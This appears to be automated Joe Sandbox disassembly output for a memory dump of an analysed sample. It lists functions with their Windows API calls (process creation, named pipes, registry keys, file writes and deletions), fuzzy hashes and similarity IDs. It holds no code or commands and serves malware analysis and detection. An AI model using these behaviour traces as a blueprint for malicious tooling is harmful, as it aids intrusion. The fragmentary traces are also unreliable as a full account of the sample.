Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: AllocateCloseErrorHandleHeapLastOpenTimerWaitablememsetwsprintf
String ID: W
API String ID: 95801598-655174618
Opcode ID: effe5bb1ae36a8ddf89ec5663fda09da49de4a959883d9097436be4bd3ff19fe
Instruction ID: 466e13ab74277947a27aecbd44c7d9dda60bf092c7b2a7ecc9d399f3d1563aed
Opcode Fuzzy Hash: effe5bb1ae36a8ddf89ec5663fda09da49de4a959883d9097436be4bd3ff19fe
Instruction Fuzzy Hash: E0519DB9501309AFDB20EF6AC944BAEBBECFF09710F10851AF959DA280D774D654CB90

Uniqueness

Uniqueness Score: -1.00%

Function 03033F6E Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 121processstringCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 03033F83

Part of subcall function 03021C9B: lstrlen.KERNEL32(00000000,00000008,-00000007,?,?,0302E657,00000000,00000000,-00000007,03030969,-00000007,?,?), ref: 03021CAA

lstrlenW.KERNEL32(00000000,00000000,00000000,?,00000000,?), ref: 03033FBC
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,?,00000000,?), ref: 03033FF7
TerminateProcess.KERNEL32(?,000003E5), ref: 03034039
GetLastError.KERNEL32 ref: 03034051
GetExitCodeProcess.KERNEL32(?,00000001), ref: 03034071
GetLastError.KERNEL32 ref: 03034089

Strings

D, xrefs: 03033F97

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Process$ErrorLastlstrlen$CodeCreateExitTerminatememset
String ID: D
API String ID: 3422117017-2746444292
Opcode ID: 9ab2871160a3a95193e5eea59b5ffcf798d894997fd9e6ec92c33b76e2bdffe3
Instruction ID: 21faa9eb1ddf7abb33ccd00bfdd54ccb3ddff0d19c5933e5a44c194382e11c28
Opcode Fuzzy Hash: 9ab2871160a3a95193e5eea59b5ffcf798d894997fd9e6ec92c33b76e2bdffe3
Instruction Fuzzy Hash: 47411BB9902218FFDB11EFA5CD859EEBBBCEB05240F2444A9E601B7150D7359F109B61

Uniqueness

Uniqueness Score: -1.00%

Function 03030EDC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 89memorystringpipeCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(03023A9F,00000000,?,?,?,?,03023A9F,00000035,00000000,?,00000000), ref: 03030F0C
RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 03030F22
memcpy.NTDLL(00000010,03023A9F,00000000,?,?,03023A9F,00000035,00000000), ref: 03030F58
memcpy.NTDLL(00000010,00000000,00000035,?,?,03023A9F,00000035), ref: 03030F73
CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 03030F91
GetLastError.KERNEL32(?,?,03023A9F,00000035), ref: 03030F9B
HeapFree.KERNEL32(00000000,00000000,?,?,03023A9F,00000035), ref: 03030FBE

Strings

(, xrefs: 03030FA5

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Heapmemcpy$AllocateCallErrorFreeLastNamedPipelstrlen
String ID: (
API String ID: 2237239663-3887548279
Opcode ID: 500ed29974813d7a4f157f0db933639848bb18204d3308de52e356fcedcff241
Instruction ID: 7c8c5d154d95da9df680ee56e76b4ca7db95cb66a08e0de4b7fbbadf9f62a271
Opcode Fuzzy Hash: 500ed29974813d7a4f157f0db933639848bb18204d3308de52e356fcedcff241
Instruction Fuzzy Hash: F731B179902309EFDB21DFA4D944AABBBBCFB45740F144825F946D2210D3359A15DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0303ACF8 Relevance: 13.6, APIs: 9, Instructions: 145stringsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0303AD2C
memcpy.NTDLL(?,?,00000010), ref: 0303AD4F
memset.NTDLL ref: 0303AD9B
lstrcpyn.KERNEL32(?,?,00000034), ref: 0303ADAF
GetLastError.KERNEL32 ref: 0303ADDD

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ErrorLastObjectSingleWaitlstrcpynmemcpymemset
String ID:
API String ID: 3790987218-0
Opcode ID: 679746200c51072c0b9e151935b4943e68ea933bb7f157b3b7adb5f42c9b625c
Instruction ID: ba2be356cc9859ab275eb7a5da23111ce81c2895f6363b3d6997f94a96b1c0dc
Opcode Fuzzy Hash: 679746200c51072c0b9e151935b4943e68ea933bb7f157b3b7adb5f42c9b625c
Instruction Fuzzy Hash: 82518C79A06300AFC761EF25C948A6BB7FCBF86B10F048A1DF59696180E774E904CB52

Uniqueness

Uniqueness Score: -1.00%

Function 03033149 Relevance: 13.6, APIs: 9, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0303592E: RtlEnterCriticalSection.NTDLL(03048448), ref: 03035936
Part of subcall function 0303592E: RtlLeaveCriticalSection.NTDLL(03048448), ref: 0303594B
Part of subcall function 0303592E: InterlockedIncrement.KERNEL32(0000001C), ref: 03035964

RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 03033186
memset.NTDLL ref: 03033197
lstrcmpi.KERNEL32(?,?), ref: 030331D7
RtlAllocateHeap.NTDLL(00000000,?), ref: 03033203
memcpy.NTDLL(00000000,?,?), ref: 03033217
memset.NTDLL ref: 03033224
memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 0303323D
memcpy.NTDLL(-00000005,?,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 03033260
HeapFree.KERNEL32(00000000,?), ref: 0303327D

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Heapmemcpy$AllocateCriticalSectionmemset$EnterFreeIncrementInterlockedLeavelstrcmpi
String ID:
API String ID: 694413484-0
Opcode ID: 611350d27398cb3aef2c9094a70d96258cc9d4a8126aa41738f193dda7894e8f
Instruction ID: 2c121f123da35d8252d057f3542070d9f34b4195407e8e7f8637037f0e1c7898
Opcode Fuzzy Hash: 611350d27398cb3aef2c9094a70d96258cc9d4a8126aa41738f193dda7894e8f
Instruction Fuzzy Hash: 464113B9E02209FFDB10DFA8DC84B9DBBBDFF45300F1484A9E904A7250D735AA048B50

Uniqueness

Uniqueness Score: -1.00%

Function 03041008 Relevance: 13.6, APIs: 9, Instructions: 121memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000), ref: 0304107B
RtlAllocateHeap.NTDLL(00000000,03047CCA), ref: 03041091
memcpy.NTDLL(00000000,00000000,03047CC8), ref: 030410A4
_wcsupr.NTDLL ref: 030410B0
lstrlenW.KERNEL32(?,03047CC8), ref: 030410E9
RtlAllocateHeap.NTDLL(00000000,?,03047CC8), ref: 030410FE
lstrcpyW.KERNEL32(00000000,?), ref: 03041114
lstrcatW.KERNEL32(00000000,?), ref: 0304113A
HeapFree.KERNEL32(00000000,00000000), ref: 03041149

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Heap$Allocatelstrlen$Free_wcsuprlstrcatlstrcpymemcpy
String ID:
API String ID: 632491215-0
Opcode ID: 19693be88ea503592cad8e3fd3ed356ca57f73e38293b64a2e46d81772e1a2d2
Instruction ID: 2a311031e413a8294df564d16b8ed442d4a2783e032ee0e3c85b35460a63b358
Opcode Fuzzy Hash: 19693be88ea503592cad8e3fd3ed356ca57f73e38293b64a2e46d81772e1a2d2
Instruction Fuzzy Hash: 773139B9103204BFC364EF79DD8896FB7ECEB88650B08467AF610D2154DB74E7808B50

Uniqueness

Uniqueness Score: -1.00%

Function 03035BE4 Relevance: 13.6, APIs: 9, Instructions: 97filememorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 03031884: memset.NTDLL ref: 030318A6
Part of subcall function 03031884: CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 03031950

MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 03035C2C
CloseHandle.KERNEL32(?), ref: 03035C38
lstrlenW.KERNEL32(00000000), ref: 03035C51
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 03035C62
wcstombs.NTDLL ref: 03035C71
lstrlen.KERNEL32(?), ref: 03035C7E
UnmapViewOfFile.KERNEL32(?,?,?,00000000,?), ref: 03035CBB
HeapFree.KERNEL32(00000000,00000000), ref: 03035CCE
DeleteFileW.KERNEL32(?), ref: 03035CDB

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: File$CloseHandleHeapViewlstrlen$AllocateDeleteFreeUnmapmemsetwcstombs
String ID:
API String ID: 947131853-0
Opcode ID: 8a950ed5db00aba4431e0da7794d34f302613e9bbc7b2360f9c40cfd170d16d8
Instruction ID: 054464bc89a7c718911d4c510c20854ec1d152648d0047d555a1c0038f9a597e
Opcode Fuzzy Hash: 8a950ed5db00aba4431e0da7794d34f302613e9bbc7b2360f9c40cfd170d16d8
Instruction Fuzzy Hash: 76316C79512208BFDB21EFA4EE49D9F7BB9FF86345F044065F901A3124DB358A24DB60

Uniqueness

Uniqueness Score: -1.00%

Function 03040A73 Relevance: 13.6, APIs: 9, Instructions: 95memoryregistrystringCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL(00000094), ref: 03040A84
RtlAllocateHeap.NTDLL(00000000,00000011), ref: 03040AAB
GetTickCount.KERNEL32 ref: 03040AC2
wsprintfA.USER32 ref: 03040AD9
RegCreateKeyA.ADVAPI32(80000001,?,00000094), ref: 03040B14
StrRChrA.SHLWAPI(00000000,00000000,?), ref: 03040B34
lstrlen.KERNEL32(00000000), ref: 03040B3E
RegCloseKey.ADVAPI32(?), ref: 03040B5A
HeapFree.KERNEL32(00000000,00000000,00000000,00000094,00000000,00000000,00000001,00000000,00000094), ref: 03040B68

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Heap$AllocateCloseCountCreateFreeHeaderImageTicklstrlenwsprintf
String ID:
API String ID: 3389039979-0
Opcode ID: 3f50003bf2d100db3413fed03aa971528b4077620bbc4d87a320451acb21f94e
Instruction ID: d014adc501210869491ba3cdd6320bc50b26c5b96989703bd0e3cdbfaae0ce31
Opcode Fuzzy Hash: 3f50003bf2d100db3413fed03aa971528b4077620bbc4d87a320451acb21f94e
Instruction Fuzzy Hash: 1031ADF9002108FFDB10AFA4DD88EABBBACEF45248B004566FA05D3114D7358F118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 03021BC3 Relevance: 13.6, APIs: 9, Instructions: 82fileCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,0303DDAC,00000008,00000001,00000010,00000001,00000000,0000003A,00000001,00000000), ref: 03021BE2
WriteFile.KERNEL32(?,00000001,?,?,?), ref: 03021C16
ReadFile.KERNEL32(?,00000001,?,?,?), ref: 03021C1E
GetLastError.KERNEL32 ref: 03021C28
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00002710), ref: 03021C44
GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 03021C5D
CancelIo.KERNEL32(?), ref: 03021C72
CloseHandle.KERNEL32(?), ref: 03021C82
GetLastError.KERNEL32 ref: 03021C8A

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ErrorFileLast$CancelCloseCreateEventHandleMultipleObjectsOverlappedReadResultWaitWrite
String ID:
API String ID: 4263211335-0
Opcode ID: f3c5e2a20f72cebd004f0f80c01ecb85d2ae6d33ed46342487715a454deebe37
Instruction ID: 4f51e3fb5e3d3b6f7c0842f74078661bf3d7402077a9b4954714fe803564cd3c
Opcode Fuzzy Hash: f3c5e2a20f72cebd004f0f80c01ecb85d2ae6d33ed46342487715a454deebe37
Instruction Fuzzy Hash: D2219F7D902128BFCB01AFA8D9898EEBFBDFB48310F108462F916D2154C7718651CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 03028C0A Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 191stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,?,0609258D,?,?,0609258D,?,?,0609258D,?,?,0609258D,?), ref: 03028D08
lstrcpyW.KERNEL32(00000000,?), ref: 03028D2B
lstrcatW.KERNEL32(00000000,00000000), ref: 03028D33
lstrlenW.KERNEL32(00000000,?,0609258D,?,?,0609258D,?,?,0609258D,?,?,0609258D,?,?,0609258D,?), ref: 03028D7E
memcpy.NTDLL(00000000,?,?,?), ref: 03028DE6
LocalFree.KERNEL32(?,?), ref: 03028DFF

Strings

P, xrefs: 03028C83

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: lstrlen$FreeLocallstrcatlstrcpymemcpy
String ID: P
API String ID: 3649579052-3110715001
Opcode ID: b6e1e4078cecc137266cecd77319781e7094a6423c0bcb40a4c1fbd0fb2e41f6
Instruction ID: d128c4325e2f331df646bd26eb35df416268350fae9fc46cf1e13fb2b9bf5bce
Opcode Fuzzy Hash: b6e1e4078cecc137266cecd77319781e7094a6423c0bcb40a4c1fbd0fb2e41f6
Instruction Fuzzy Hash: DC6190B990322AAFDF11EFA8DD84DEEBBFDEB85300B148425E504A7214D7749A05CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0303CE46 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 148timestringCOMMON

Download Yara Rule

APIs

Part of subcall function 03024DA2: InterlockedIncrement.KERNEL32(?), ref: 03024DF3
Part of subcall function 03024DA2: RtlLeaveCriticalSection.NTDLL ref: 03024E7E

OpenProcess.KERNEL32(00000410,FD189D89,03039026,00000000,0000001C,00000000,00000000,?,?,?,03039026), ref: 0303CEA0
CloseHandle.KERNEL32(00000000,00000000,00000000,03039036,00000104,?,?,?,03039026), ref: 0303CEBE
GetSystemTimeAsFileTime.KERNEL32(03039026), ref: 0303CF26
lstrlenW.KERNEL32(00800014), ref: 0303CF9B
GetSystemTimeAsFileTime.KERNEL32(00000008,0000001A), ref: 0303CFB7
memcpy.NTDLL(00000014,00800014,00000002), ref: 0303CFCF

Part of subcall function 0303EC2D: RtlLeaveCriticalSection.NTDLL(?), ref: 0303ECAA

Strings

o, xrefs: 0303CF8C

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Time$CriticalFileLeaveSectionSystem$CloseHandleIncrementInterlockedOpenProcesslstrlenmemcpy
String ID: o
API String ID: 2541713525-252678980
Opcode ID: 5b932ab89190723c59230fc141c11ca1de6e99ec25149286a466fcb6080841f6
Instruction ID: b53190003f1f8821a3f15a904a312c72fb5b75b74b05f97c4ba15eb7b5d3f13f
Opcode Fuzzy Hash: 5b932ab89190723c59230fc141c11ca1de6e99ec25149286a466fcb6080841f6
Instruction Fuzzy Hash: 0051B0B9602706AFE760EF64C984BAAB7FCFF05700F044529EA05E7244D774E984CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0302BC0B Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 119memorythreadstringCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL ref: 0302BC35
GetCurrentThreadId.KERNEL32 ref: 0302BC4B
GetCurrentThread.KERNEL32 ref: 0302BC5C

Part of subcall function 0303E52A: GetCurrentThreadId.KERNEL32 ref: 0303E562
Part of subcall function 0303E52A: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,0302A177,000004D2), ref: 0303E56E
Part of subcall function 0303E52A: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,0302A177,000004D2), ref: 0303E57C
Part of subcall function 0303E52A: lstrcpy.KERNEL32(00000000), ref: 0303E59E

Part of subcall function 03023B65: lstrlen.KERNEL32(?,00000001,?,?,?,00000001), ref: 03023BD0
Part of subcall function 03023B65: HeapFree.KERNEL32(00000000,00000000,?,?,?,00000001), ref: 03023BF8

RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 0302BD30
wsprintfA.USER32 ref: 0302BD48
lstrlen.KERNEL32(00000000,00000000), ref: 0302BD53

Strings

W, xrefs: 0302BD1D

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: CurrentThread$FileHeapTimelstrlen$AllocateFreeHeaderImageNameSystemTemplstrcpywsprintf
String ID: W
API String ID: 896920683-655174618
Opcode ID: 23a603e725102926ff6c2940ccf45e871325175c7835f133c94f9173d79c3938
Instruction ID: 670ecf2122b0cf67d9d892fa2edda6252fcef148448f55756a623504ee7c187f
Opcode Fuzzy Hash: 23a603e725102926ff6c2940ccf45e871325175c7835f133c94f9173d79c3938
Instruction Fuzzy Hash: 594159B9902229BFCF11EFA4ED449EEBFB8FF44740B148426FA0596114E735A650DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0303E32A Relevance: 12.2, APIs: 8, Instructions: 161memoryfilestringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 0303E370
RtlAllocateHeap.NTDLL(00000000,?), ref: 0303E44B
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,00000000), ref: 0303E484
WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 0303E49D
CloseHandle.KERNEL32(00000000,?,00000000), ref: 0303E4A7
HeapFree.KERNEL32(00000000,?,?,00000000), ref: 0303E4B7
HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 0303E4D0
HeapFree.KERNEL32(00000000,?,?,00000000), ref: 0303E4E0

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Heap$Free$File$AllocateCloseCreateHandleWritelstrcpy
String ID:
API String ID: 1002670662-0
Opcode ID: e8a7ff561c466f5bf288b1d63ef062ef81839fdf0cda77816008401958675b9e
Instruction ID: c3c257982e12140eb0609247809a000f1388be00c4a87a3f6f386db81fdfbb4d
Opcode Fuzzy Hash: e8a7ff561c466f5bf288b1d63ef062ef81839fdf0cda77816008401958675b9e
Instruction Fuzzy Hash: B6519CBA402108FFDB11EFA4DD84CAEBBBDFF49204B0985A6FA5593110D7359A16CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0302981B Relevance: 12.1, APIs: 8, Instructions: 52registryCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000040,00000000,?), ref: 03029827
RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 03029845
RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0302984D
DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 0302986B
GetLastError.KERNEL32 ref: 0302987F
RegCloseKey.ADVAPI32(?), ref: 0302988A
CloseHandle.KERNEL32(00000000), ref: 03029891
GetLastError.KERNEL32 ref: 03029899

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: CloseErrorHandleLastOpen$CreateDuplicateProcess
String ID:
API String ID: 3822162776-0
Opcode ID: dc95fc30ce0602b2aace0bbe930ae75da4823047072309c0e7ddba1cc918b12b
Instruction ID: 6ca0ba24fb008416ba525aec72897a92839297ab7636fd750225b186ab728e5c
Opcode Fuzzy Hash: dc95fc30ce0602b2aace0bbe930ae75da4823047072309c0e7ddba1cc918b12b
Instruction Fuzzy Hash: 811161BD102209BFDB01AFA4D959BA93FADFB44351F184465FE06C5254DB35CA20CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0302A7D9 Relevance: 10.7, APIs: 7, Instructions: 195memorystringthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 0302F2AE: WaitForSingleObject.KERNEL32(00000000,?,00000000,?,030333D4,0302D497,00000000,00000001,03026FCB,00000000), ref: 0302F3D3
Part of subcall function 0302F2AE: HeapFree.KERNEL32(00000000,00000000,?,00000000,?,030333D4,0302D497,00000000,00000001,03026FCB,00000000), ref: 0302F3FC
Part of subcall function 0302F2AE: HeapFree.KERNEL32(00000000,0302D497,?,00000000,?,030333D4,0302D497,00000000,00000001,03026FCB,00000000), ref: 0302F40C
Part of subcall function 0302F2AE: RegCloseKey.ADVAPI32(030333D4,?,00000000,?,030333D4,0302D497,00000000,00000001,03026FCB,00000000), ref: 0302F415

lstrcmp.KERNEL32(?,?), ref: 0302A850
StrStrA.SHLWAPI(?,?,030374BB,?,00000001,?,?,03043054), ref: 0302A894
GetCurrentThreadId.KERNEL32 ref: 0302A92D
GetCurrentThread.KERNEL32 ref: 0302A93E
RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 0302A99C
wsprintfA.USER32 ref: 0302A9B4

Part of subcall function 03028922: lstrlen.KERNEL32(?,?,?,00000008,03023B81), ref: 0302892C
Part of subcall function 03028922: StrRChrA.SHLWAPI(?,00000000,0000002E,?,00000003,?,?,00000008,03023B81), ref: 03028957
Part of subcall function 03028922: StrStrA.SHLWAPI(00000000,?,?,00000003,?,?,00000008,03023B81), ref: 03028976
Part of subcall function 03028922: lstrcat.KERNEL32(00000000,?), ref: 030289AE

lstrlen.KERNEL32(00000000,00000000), ref: 0302A9BF

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Heap$CurrentFreeThreadlstrlen$AllocateCloseObjectSingleWaitlstrcatlstrcmpwsprintf
String ID:
API String ID: 1394831805-0
Opcode ID: 4934e05e32b66636e4df9f29aacac5451df4f3e55d2e8e65197e576cc69c26f6
Instruction ID: 6b6fde24081636010a9a88294d77aae7b80fe2104d5f213a69e0f09718229651
Opcode Fuzzy Hash: 4934e05e32b66636e4df9f29aacac5451df4f3e55d2e8e65197e576cc69c26f6
Instruction Fuzzy Hash: 1D7138B9A02229EFDB51EFA5D944EEEBFB9FF08300F048455E504A7220DB35AA45DF50

Uniqueness

Uniqueness Score: -1.00%

Function 0302A471 Relevance: 10.6, APIs: 7, Instructions: 144memoryregistryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,?), ref: 0302A4E4
HeapFree.KERNEL32(00000000,?), ref: 0302A525
HeapFree.KERNEL32(00000000,00000000), ref: 0302A535
HeapFree.KERNEL32(00000000,00000000,?,0303B270,00000000,?,?,?), ref: 0302A5A1
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,0303B270,00000000,?,?,?,?), ref: 0302A5C5
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0303B270,00000000,?,?,?), ref: 0302A5EA
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,0303B270,00000000,?,?,?), ref: 0302A5FF

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: FreeHeap$CloseCreate
String ID:
API String ID: 1871255303-0
Opcode ID: aaf013309d3149e1d47e4d889c8fa6dabe406e82006e10fd1d11cf10a89b2add
Instruction ID: ac668f407a4af4de37b4925f2c8a3dc37261dee358c52ac35105f0431c8419bd
Opcode Fuzzy Hash: aaf013309d3149e1d47e4d889c8fa6dabe406e82006e10fd1d11cf10a89b2add
Instruction Fuzzy Hash: 5151F7B9D01229EFDF51EFE4D9848EEBFB9FB08300F14846AE505A2114DB359A50DF60

Uniqueness

Uniqueness Score: -1.00%

Function 03038D03 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 125memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000001), ref: 03038D5E
RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 03038D89
memcpy.NTDLL(00000000,?,?), ref: 03038DA8
HeapFree.KERNEL32(00000000,00000000), ref: 03038E09
memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 03038E2B

Strings

W, xrefs: 03038E57

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Heap$Allocatememcpy$Free
String ID: W
API String ID: 1024222012-655174618
Opcode ID: c57784fc92f7aec14e8e4ebba645deb73d250c298ab097ca4fd83a7fbf355aca
Instruction ID: e459e82704a7d46dcb25966d73bfed51130c8103977c4c8713cb5e1182f448b6
Opcode Fuzzy Hash: c57784fc92f7aec14e8e4ebba645deb73d250c298ab097ca4fd83a7fbf355aca
Instruction Fuzzy Hash: E8417FB590230AEFDF11DF54CC84AAEBBB8FF05244F1484A5F90497210E735DA589FA1

Uniqueness

Uniqueness Score: -1.00%

Function 0302FD0C Relevance: 10.6, APIs: 7, Instructions: 124registrymemoryCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL ref: 0302FD35
RtlEnterCriticalSection.NTDLL(03048088), ref: 0302FD78
RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0302FD93
CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 0302FDE9
HeapFree.KERNEL32(00000000,?,?,00000000,00000000,?,?,?), ref: 0302FE45
RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?), ref: 0302FE53
RtlLeaveCriticalSection.NTDLL(03048088), ref: 0302FE5E

Part of subcall function 0302BB6B: RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 0302BB7F
Part of subcall function 0302BB6B: memcpy.NTDLL(00000000,030231D1,?,?,00000008,?,?,030231D1,00000000,?,?), ref: 0302BBA8
Part of subcall function 0302BB6B: RegCloseKey.ADVAPI32(?,?,?,030231D1,00000000,?,?), ref: 0302BBFC

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Close$CriticalSection$CreateEnterFreeHandleHeaderHeapImageLeaveOpenmemcpy
String ID:
API String ID: 2070110485-0
Opcode ID: 484fad447c31d1d080715d21d876379aec8af25aab550aeebaa6239783e448f4
Instruction ID: 9db9abb0e4f1d3cd20f71c168fbbab3864924bdb4fa60ee67b33b4260fc858fc
Opcode Fuzzy Hash: 484fad447c31d1d080715d21d876379aec8af25aab550aeebaa6239783e448f4
Instruction Fuzzy Hash: 99419DBA202216AFDF62EF68D984F6A7BBDEF40780F084424F905DA155DB35DA11CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0303DC2D Relevance: 10.6, APIs: 7, Instructions: 111memoryfilestringCOMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(0304808C), ref: 0303DC3F
lstrcpy.KERNEL32(00000000), ref: 0303DC7B

Part of subcall function 03021C9B: lstrlen.KERNEL32(00000000,00000008,-00000007,?,?,0302E657,00000000,00000000,-00000007,03030969,-00000007,?,?), ref: 03021CAA

GetLastError.KERNEL32(00000000), ref: 0303DD0A
HeapFree.KERNEL32(00000000,?), ref: 0303DD21
InterlockedDecrement.KERNEL32(0304808C), ref: 0303DD38
DeleteFileA.KERNEL32(00000000), ref: 0303DD59
HeapFree.KERNEL32(00000000,00000000), ref: 0303DD69

Part of subcall function 0303E52A: GetCurrentThreadId.KERNEL32 ref: 0303E562
